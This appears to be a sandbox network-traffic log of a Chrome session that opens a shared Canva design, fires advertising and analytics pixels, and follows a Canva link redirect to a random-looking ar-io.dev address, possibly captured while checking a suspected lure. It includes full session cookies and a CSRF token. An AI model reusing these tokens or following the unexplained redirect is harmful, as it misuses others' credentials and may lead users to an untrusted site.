                                                                                                                                                                                                                                                                    set-cookie: FPLC=5T4y3Aln1rq9tz4IP5pa2XLlMoT8sVjBne%2B7ZY3jjKITHDmZmuC8CFU7uPPJ3nzj4lD3skaWzRa7Sk22VvZkaXCzcC8ETNGf7ip%2BP6beUKCjAkpBcTbU3jEs8iTQZw%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC736INData Raw: 32 64 39 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 32 30 33 37 33 30 36 38 39 39 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c
                                                                                                                                                                                                                                                                    Data Ascii: 2d9event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC686INData Raw: 32 61 37 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 32 30 33 37 33 30 36 38 39 39 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c 31 6c 31 3b 75 61 61 3d 78 38 36 3b 75 61 62 3d 36 34 3b 75 61 66
                                                                                                                                                                                                                                                                    Data Ascii: 2a7event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uaf
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1408INData Raw: 35 39 33 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 61 64 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 63 6f 6e 76 65 72 73 69 6f 6e 2f 38 30 34 37 35 37 30 37 39 2f 3f 72 61 6e 64 6f 6d 3d 31 37 30 35 36 32 39 35 34 26 66 73 74 3d 31 37 33 32 31 31 34 39 31 39 34 35 39 26 63 76 3d 31 30 26 66 6d 74 3d 33 26 6c 61 62 65 6c 3d 59 61 78 4b 43 4b 54 4a 6c 59 77 59 45 4e 65 38 33 76 38 43 26 62 67 3d 66 66 66 66 66 66 26 67 75 69 64 3d 4f 4e 26 75 5f 77 3d 31 32 38 30 26 75 5f 68 3d 31 30 32 34 26 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33
                                                                                                                                                                                                                                                                    Data Ascii: 593event: messagedata: {"send_pixel":["https://www.googleadservices.com/pagead/conversion/804757079/?random=170562954&fst=1732114919459&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4bi1v872399471z8812729902z98483
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC26INData Raw: 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: tion_reporting":true}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    144192.168.2.1249887104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC3043OUTGET /link?target=https%3A%2F%2F6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev%2F8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuI&design=DAGXBQfQ3AM&accessRole=viewer&linkSource=document HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1302INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:59 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Location: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuI
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951865f0843eb-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, no-cache, no-cache, no-store, no-cache
                                                                                                                                                                                                                                                                    Content-Language: en-US
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e5951865f0843eb
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Server-Timing: cfCacheStatus;desc="DYNAMIC"
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3a%2FbpA8IrSawggaC5t2GkvBLUjFie54CYcare7%2FspWDXvpTYBfW0ZV%2BcVOrWHbnPwJoFhqd4dIOOPV4XwdPxKdBdAPOznFexMXvo5Oyof7Kwqq%2BLqC7%2Faz%2BWvIEUJ8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    145192.168.2.1249889104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC3151OUTPOST /_ajax/designinsight/heartbeats HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 100
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Csrf-Token: rGqerD8sX1rCOMoka0_nZywB9S9y2_y5c4PGQ9eLEe5snd9QSZPiOVfQDicUUcpxsq8RgFuu66z0kWPDtNx-49kxplFGRxIQNInYQQj_o47msdy4
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                    X-Canva-Request: recordheartbeat
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC100OUTData Raw: 7b 22 41 22 3a 31 2c 22 42 22 3a 22 62 62 61 63 37 61 36 34 2d 66 64 33 65 2d 34 65 31 64 2d 39 64 39 64 2d 35 35 61 31 35 36 31 63 33 31 64 66 22 2c 22 43 22 3a 22 44 41 47 58 42 51 66 51 33 41 4d 22 2c 22 44 22 3a 22 68 35 64 31 31 37 30 36 66 36 31 22 2c 22 45 22 3a 32 2c 22 47 22 3a 22 43 22 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"A":1,"B":"bbac7a64-fd3e-4e1d-9d9d-55a1561c31df","C":"DAGXBQfQ3AM","D":"h5d11706f61","E":2,"G":"C"}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:59 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595186adc142b9-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e595186adc142b9
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkFYvJotqQNcjE%2F2z91Oyi7qoPbnIEFkJFnIrikkPwoftl%2Bg8zSH1GaP1PnNyXFdB7MM95NtA2aXRuy1EZ%2BFfVzIJgjFFDcJBlqXC1UIX0kIbZOoM9HOfHWYk9EtPPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    146192.168.2.124988118.165.220.66443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC523OUTGET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: UID=18F9c60199021e57f0570b91732114914
                                                                                                                                                                                                                                                                    2024-11-20 15:02:00 UTC363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:59 GMT
                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 90772e5ec48c9653874b9b06fe89ab50.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: weN98iUdsSIfk3Akeozx2DZfPCpteQ8VOnqbwe41UskTmwE61_tNFA==
                                                                                                                                                                                                                                                                    2024-11-20 15:02:00 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    147192.168.2.1249885172.217.17.70443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1538OUTGET /activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Attribution-Reporting-Eligible: trigger=navigation-source, event-source
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:02:00 UTC2970INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:02:00 GMT
                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                    Attribution-Reporting-Register-Trigger: {"aggregatable_deduplication_keys":[{"deduplication_key":"17265967172132661282"}],"aggregatable_trigger_data":[{"filters":[{"14":["16303776"]}],"key_piece":"0xbc86f8539bf76b4c","source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]},{"key_piece":"0xa8e631050c486903","not_filters":{"14":["16303776"]},"source_keys":["12","13","14","15","16","17","18","19","20","21","24752168","24752169","24752170","24752171","628512992","628512993","628512994","628512995","628717332","628717333","628717334","628717335","628748640","628748641","628748642","628748643","628760464","628760465","628760466","628760467","640991956","640991957","640991958","640991959"]}],"aggregatable_values":{"12":65,"13": [TRUNCATED]
                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                    Set-Cookie: ar_debug=1; expires=Fri, 20-Dec-2024 15:02:00 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                    Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 20-Nov-2024 15:17:00 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    148192.168.2.1249886172.217.17.70443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:59 UTC1353OUTGET /activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=1893244437;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor? HTTP/1.1
                                                                                                                                                                                                                                                                    Host: ad.doubleclick.net
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
